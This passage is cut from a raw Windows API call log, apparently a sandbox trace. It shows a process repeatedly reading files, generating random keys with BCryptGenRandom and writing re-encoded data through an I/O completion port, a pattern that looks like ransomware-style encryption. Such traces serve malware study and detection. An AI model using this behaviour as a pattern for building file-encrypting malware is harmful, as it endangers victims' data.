GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0183.739] CloseHandle (hObject=0x2a4) returned 1 [0183.739] free (_Block=0x3df0008) [0183.739] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0184.476] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x20ee, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0184.477] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0184.477] CloseHandle (hObject=0x3cc) returned 1 [0184.477] free (_Block=0x1ff1e60) [0184.477] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0184.503] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.504] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0184.504] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.504] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0184.504] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0184.504] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0184.504] free (_Block=0x3e305b8) [0184.504] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0184.504] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0184.505] free (_Block=0x1fa91d0) [0184.505] free (_Block=0x1fa2ed8) [0184.505] free (_Block=0x1fa90b8) [0184.505] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0184.505] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0184.507] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2026, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0184.508] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0184.518] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.519] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0184.519] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.519] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0184.520] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0184.520] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0184.520] free (_Block=0x3e305b8) [0184.520] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0184.520] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0184.520] free (_Block=0x1fa91d0) [0184.520] free (_Block=0x1fa2ed8) [0184.520] free (_Block=0x1fa90b8) [0184.520] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0184.520] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0184.527] CloseHandle (hObject=0x2a4) returned 1 [0184.527] free (_Block=0x1ff1e60) [0184.527] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0184.535] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xe1d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0184.535] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0184.543] CloseHandle (hObject=0x308) returned 1 [0184.543] free (_Block=0x3d70450) [0184.543] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0184.549] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x38c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0184.549] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0184.558] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.558] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0184.558] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.559] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0184.559] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0184.559] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0184.559] free (_Block=0x3e305b8) [0184.559] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0184.559] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0184.560] free (_Block=0x1fa91d0) [0184.560] free (_Block=0x1fa2ed8) [0184.560] free (_Block=0x1fa90b8) [0184.560] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0184.560] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0184.570] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.571] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0184.571] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.571] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0184.571] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0184.571] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0184.571] free (_Block=0x3e305b8) [0184.571] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0184.571] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0184.572] free (_Block=0x1fa91d0) [0184.572] free (_Block=0x1fa2ed8) [0184.572] free (_Block=0x1fa90b8) [0184.572] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0184.572] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0184.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.582] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0184.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.582] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0184.583] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0184.583] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0184.583] free (_Block=0x3e305b8) [0184.583] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0184.583] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0184.583] free (_Block=0x1fa91d0) [0184.583] free (_Block=0x1fa2ed8) [0184.583] free (_Block=0x1fa90b8) [0184.583] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0184.584] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0184.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.593] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0184.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.593] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0184.594] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0184.594] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0184.594] free (_Block=0x3e305b8) [0184.594] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0184.594] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0184.594] free (_Block=0x1fa91d0) [0184.594] free (_Block=0x1fa2ed8) [0184.594] free (_Block=0x1fa90b8) [0184.594] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0184.594] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0184.602] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.602] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0184.602] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.603] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0184.603] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0184.603] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0184.603] free (_Block=0x3e305b8) [0184.603] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0184.603] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0184.604] free (_Block=0x1fa91d0) [0184.604] free (_Block=0x1fa2ed8) [0184.604] free (_Block=0x1fa90b8) [0184.604] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0184.604] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.575] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0185.575] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.589] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.589] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0185.589] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.590] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0185.590] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.590] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.590] free (_Block=0x3e305b8) [0185.590] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.590] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.591] free (_Block=0x1fa91d0) [0185.591] free (_Block=0x1fa2ed8) [0185.591] free (_Block=0x1fa90b8) [0185.591] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0185.591] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.593] CloseHandle (hObject=0x2a4) returned 1 [0185.597] free (_Block=0x3d70450) [0185.597] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.626] CloseHandle (hObject=0x308) returned 1 [0185.626] free (_Block=0x3e70008) [0185.626] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.626] CloseHandle (hObject=0x3cc) returned 1 [0185.626] free (_Block=0x3f70048) [0185.626] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.629] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x90c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0185.629] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.629] CloseHandle (hObject=0x170) returned 1 [0185.629] free (_Block=0x3df0008) [0185.629] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.769] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.769] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0185.769] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.770] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0185.770] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.770] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.770] free (_Block=0x3e305b8) [0185.770] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.770] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.770] free (_Block=0x1fa91d0) [0185.770] free (_Block=0x1fa2ed8) [0185.770] free (_Block=0x1fa90b8) [0185.770] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0185.771] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.772] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0185.773] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.796] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd0aa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0185.802] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.809] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.810] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0185.810] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.811] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0185.811] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.811] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.811] free (_Block=0x3e305b8) [0185.811] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.811] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.812] free (_Block=0x1fa91d0) [0185.812] free (_Block=0x1fa2ed8) [0185.812] free (_Block=0x1fa90b8) [0185.812] WriteFile (in: hFile=0x330, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0185.813] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.832] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x3f427, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0185.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.860] CloseHandle (hObject=0x338) returned 1 [0185.860] free (_Block=0x3f70048) [0185.860] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.873] ReadFile (in: hFile=0x330, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x109e5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0185.886] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.899] CloseHandle (hObject=0x330) returned 1 [0185.899] free (_Block=0x3d70450) [0185.899] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.908] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0185.922] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.926] CloseHandle (hObject=0x170) returned 1 [0185.926] free (_Block=0x3df0008) [0185.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, 